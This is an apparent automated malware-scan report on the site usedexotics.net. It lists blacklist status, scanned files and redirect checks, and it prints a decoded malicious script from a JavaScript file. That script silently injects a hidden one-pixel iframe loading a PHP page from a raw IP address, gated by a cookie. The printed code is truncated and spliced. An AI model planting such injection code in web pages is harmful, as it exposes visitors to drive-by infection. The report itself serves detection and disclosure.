Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=usedexotics.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://usedexotics.net/ | 200 OK Content-Length: 6949 Content-Type: text/html | clean |
http://usedexotics.net/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 11172 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) Decoded script: String String function zzzfff() { var iuzq = document.createElement('iframe'); iuzq.src = 'http://101.110.168.104/8pPtHKXF.php'; iuzq.style.position = 'absolute'; iuzq.style.border = '0'; iuzq.style.height = '1px'; iuzq.style.width = '1px'; iuzq.style.left = '1px'; iuzq.style.top = '1px'; if (!document.getElementById('iuzq')) { document.write('<div id=\'iuzq\'></div>'); document.getElementById ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://usedexotics.net/test404page.js | 404 Not Found Content-Length: 396 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: usedexotics.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Jul 2014 04:08:12 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 6949
Content-Type: text/html
...6949 bytes of data.
GET / HTTP/1.1
Host: usedexotics.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Jul 2014 04:08:12 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 6949
Content-Type: text/html
...6949 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: usedexotics.net
Referer: http://www.google.com/search?q=usedexotics.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: usedexotics.net
Referer: http://www.google.com/search?q=usedexotics.net
Result:
The result is similar to the first query. There are no suspicious redirects found.